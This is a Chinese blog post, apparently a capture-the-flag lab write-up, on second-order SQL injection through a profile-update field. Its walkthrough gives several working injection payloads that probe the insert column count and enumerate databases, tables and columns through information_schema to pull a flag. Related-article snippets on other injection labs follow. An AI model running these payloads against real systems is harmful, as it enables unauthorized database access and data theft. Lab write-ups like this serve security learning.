基于掌控安全靶场之sql二次注入

已于 2025-03-21 14:35:55 修改
阅读量510 收藏 6
点赞数 14
分类专栏: 网络安全 文章标签: sql 网络安全 web安全 网络攻击模型 安全威胁分析 计算机网络 密码学
于 2025-03-04 00:58:10 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/w11111111152/article/details/146003205
版权

免责声明:用户因使用公众号内容而产生的任何行为和后果,由用户自行承担责任。本公众号不承担因用户误解、不当使用等导致的法律责任

目录

1.打开靶场

2.分析靶场   

1.构造pyload测试:

2.pyload:

3.查询表中数据

4.查询fl4g

总结

首先二次注入难以使用工具sqlmap,需要登录才能注入,例如sql-labs靶场24关(比这个简单),首先确认inster插入字段数,然后就可以常规手法注入。其中-- qwe为--+

1.打开靶场

2.分析靶场   

首先登录发现需要进行注册,因为提示为sql二次注入所以猜测需要登录才能注入,于是注册一个账号密码登录,登录后发现有修改个人信息的模块所以猜测这里就是注入点。其中有一个userid,我们猜测这个就是注入点,但是输入字符提示只能输入数字,所以我们将注入语句进行16进制转化后注入,打开登录日志发现有表如下,这表有查询修改插入的功能,当我们登录时数据进行插入,所以第一步为检测inster插入字段数为多少

1.构造pyload测试:

,1’,1,1,1) -- qwe 转换为16进制

解释:

-- qwe =--+

注入发现字段数为4所以接下来构建查询数据库表等语句

2.pyload:

1’,(select database()),1,1) -- qwe  

查询得到一个表ctf

pyload:

1',(select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1) -- qwe

3.查询表中数据

Pyload:

1',(select group_concat(column_name) from information_schema.columns where table_name='injectflag'),1,1) -- qwe

4.查询fl4g

Pyload:

1',(select fl4g from injectflag limit 1,1),1,1) -- qwe

总结

首先二次注入难以使用工具sqlmap,需要登录才能注入,例如sql-labs靶场24关(比这个简单),首先确认inster插入字段数,然后就可以常规手法注入。其中-- qwe为--+

                            

(需要源代码联系博主免费领取!!还希望多多关注点赞支持,你的支持就是我的最大动力!!!)

 

 

sqli-labs靶场实现(十)【二次注入(二阶注入)】(less-24、具体步骤+图文详解)
weixin_46709219的博客
01-05 1394
一)二次注入 1)二次注入介绍 2)二次注入代码分析 3)二次注入利用 4)二次注入危害 ———————————————————————————————————————————————————— 一)二次注入 1)二次注入介绍: 网站服务器和数据库服务器的交互是一个双向的过程,用户通过浏览器访问网站服务器进行用户注册,注册之后就可以登录网站。此时注册时的信息会进行“注册信息存储”(如:账号、密码),那么也就会存储到数据库服务器中就有了第一个输入。之后我们进行信息修改时也会进行数据库的交互,那么就会将第
SQL注入漏洞-08】二次注入靶场实战
cc
02-06 5722
二次注入漏洞是一种在Web应用程序中广泛存在的安全漏洞形式。相对于一次注入漏洞而言,二次注入漏洞更难以被发现,但是它却具有与一次注入攻击漏洞相同的攻击威力。
渗透测试SQL注入之【常规的SQL注入语句】这个渗透测试知识点教会你如何去做一些常规的sql注入
最新发布
白帽阿叁的博客
04-15 1239
SQL注入攻击漏洞的原因,是由于程序员在编写Web程序时,_没有对客户端(比如浏览器等)提交的参数进行严格的过滤和判断。用户可以修改参数或数据,并传递至服务器端,导致服务端拼接了伪造的SQL查询语句,服务端连接数据库,并将伪造的sql语句发送给数据库服务端执行,数据库将sql语句的执行结果,返回给了服务端,服务端又将结果返回给了客户端,从而获取到敏感信息,甚至执行危险的代码或_系统命令。简单来说就是:注入产生的原因是接受相关参数未经处理直接带入数据库查询操作前端页面上所有提交数据的地方。
二次靶场练习:cookie注入
weixin_30907523的博客
01-12 1965
cookie注入 本文章目的是对相关的黑客内容进一步了解,如有人违反相关的法律法规,本人概不负责 一、学习目的: 利用手工注入网站 利用sqlmab注入 二、附件说明 靶场网址:http://120.203.13.75:8001/shownews.asp 工具sqlmap下载:https://download.youkuaiyun.com/download/qq_41803...
sqli-labs靶场-24-二次注入小应用
m0_73255659的博客
01-25 976
其实二次注入并不难理解 ,只不过可能用的比较困难需要很多的前提条件!
iwebsec靶场 SQL注入漏洞通关笔记13-二次注入
mooyuan的网络安全博客
12-03 2793
打开靶场,url为如下所示是一个注册界面,参数为用户名、密码和邮箱,源码猜测是SQL insert语句,将其插入到数据库的某个表中。点击通过邮箱找回密码进入如下界面,根据功能应该是通过邮箱找到用户名和密码,并展示出来SQL二次注入主要分析几个内容(1)注入点是什么?iwebsec的第13关关卡的注入点为username(2)注入点闭合方式与注入?这部分是普通的字符型注入,闭合方式为单引号(3)是否满足二次注入?很明显通过源码分析符合二次注入条件。
封神台靶场(一)为了女神小芳 【SQL注入攻击】(超级详细)
xiao_mai_的博客
05-11 1126
这里写自定义目录标题欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 欢迎使用Markdown编辑器 你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Mar
通过SQL手工注入拿到管理员密码--辛巴猫舍
ningmini的博客
05-20 2157
通过SQL手工注入拿到管理员密码–辛巴猫舍 靶场地址: http://rhiq8003.ia.aqlab.cn/ 点击新闻页面看看 域名后面加上了id=1,说明存在着数据库的交互 那么这里就很有可能是注入点 把这个作为我们的目标url:http://rhiq8003.ia.aqlab.cn/?id=1 进入手工注入步骤 第一步 判断是否存在SQL注入漏洞 构造and 1=1,这个语句是恒成立的,一般页面都是不报错的 再来试试1=2 出错,初步说明存在着注入漏洞 第二步 判断数据库字段数 在这里会使用
封神台-掌控者新靶场 - Kali系列4题
热门推荐
weixin_43821278的博客
03-11 1万+
靶场 - Kali系列【4题】 Kali渗透 - Sqlmap实操靶场
SQL注入-05】布尔盲注案例
m0_64378913的博客
04-26 1994
目录1 概述2 操作环境3 操作具体步骤3.1 判断是否存在注入点及注入的类型3.2 测试数据库库名长度3.3 逐个测试数据库库名的字符3.4 测试该数据库中所有表名3.5 测试users表中的所有字段名3.6 测试敏感字段的字段内容4 总结参考文章 1 概述 当改变浏览器传给后台SQL的参数后,浏览器没有显示对应内容也没有显示报错信息时,无法使用union联合查询注入与报错注入,这时候可以试试看能否使用布尔注入。具体参考《【SQL注入-02】SQL注入点的简单判断》。 布尔盲注:一般情况下,当带入参数为真
Access注入——Cookie注入,偏移注入
weixin_46601374的博客
02-26 1328
Cookie注入简介 什么是Cookie? Cookie就是代表你身份的一串字符串,网站根据Cookie来识别你是谁,如果你获取了管理员的Cookie,你可以无需密码直接登陆管理员账号
sqli-labs靶场-24-二次注入小应用_sqli靶场24关,网络安全架构师必备框架技能核心笔记
2401_84183070的博客
04-10 766
都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且后续会持续更新**
攻防世界靶场web-supersqli)--堆叠注入二次注入
DMXA的博客
09-21 532
这段代码是使用 PHP 语言编写的一个正则表达式,用于检测变量 $inject 中是否包含一些常见的 SQL 注入攻击关键字。具体来说,它通过 preg_match() 函数匹配字符串 $inject 中是否存在以下关键字(不区分大小写):select: 查询关键字。update: 更新关键字。delete: 删除关键字。drop: 删除表关键字。insert: 插入关键字。where: 查询条件关键字。.: 正则表达式中的特殊字符,可能被用于注入攻击。
sqli-lab靶场学习(七)——Less23-25(关键字被过滤、二次注入
sadoshi的专栏
03-05 480
之前的每一关,我们都是在末尾加上注释符,屏蔽后面的语句,这样我们只要闭合了区间之后,差不多就是为所欲为的状态。但如果注释符不生效的情况下,又该如何呢?
web漏洞-渗透测试-加密解密注入-二次注入-DNSlog带外注入-中转注入-附SQLi-LABS靶场操作示例
ran的博客
01-18 823
加解密注入就是比常规注入多了一步,需要对网站加密方式进行还原,在注入过程中,所有的注入语句要按照网站的加密方式进行加密后再进行注入。DNS(Domain Name System,域名系统),因特网上作为域名和IP地址相互映射的一个分布式数据库,能够使用户更方便的访问互联网,而不用去记住能够被机器直接读取的IP数串。通过主机名,最终得到该主机名对应的IP地址的过程叫做域名解析(或主机名解析)。sqlmap工具;BurpSuit抓包;SQLi-LABS靶场
sql注入二次攻击
forwardss的博客
03-07 568
二次注入攻击 什么是二次注入? 二次注入是指已存储(数据库,文件)的用户输入被读取后再次进入到SQL查询语句中导致的注入二次注入sql注入的一种,但是比普通sql注入利用更加困难,利用门槛更高。 普通注入数据直接进入到 SQL 查询中,而二次注入则是输入数据经处理后存储,取出后,再次进入到 SQL 查询。 二次注入原理 二次注入的原理,在第一次进行数据库插入数据的时候,仅仅只是使用了 add...
sql注入练习3(二次注入
kkzzjx
05-30 593
这个注入还挺有意思~~ 原理:比如在注册的地方。。。对用户输入进行了转义,用户注册了一个admin' -- - (无法注入了) 但是把它直接插入了sql中,取出来的时候仍能用admin登录 举个栗子: 更新密码语句: update users set password='test' where username='admin' -- -' 似乎要改变的是admin’ – - 账户的密码,实际上改了admin账户的密码 如果我知道username是admin的话,我就可以尝试一下二次注入拿下密码了 sqli
渗透测试---手把手教你SQL注入(6)---二次注入以及对getshell的总结与补充
weixin_52796034的博客
10-15 765
有的时候,"明面上"无论如何都找不到可利用的注入点,但是在某些场景中,尤其是创建用户并修改密码的过程中,我们可以针对程序的调用过程进行操作-----亦即,在数据库查询的过程中,需要调用已有的数据时,可能存在注入漏洞(刚开始时没有注入点,但当我们人为地递交一些合法的数据后,可以利用这些数据进行注入)
sqli-labs靶场:掌握SQL注入渗透测试技巧
靶场往往提供从基础到高级的多种挑战,每个挑战对应不同的安全漏洞和防御机制,帮助用户全方位掌握SQL注入的攻防知识。 5. sqli-labs使用说明: sqli-labs是一个面向初学者和中级渗透测试人员的SQL注入练习平台,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

安全瞭望Sec

感谢您的打赏,您的支持让我更加

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值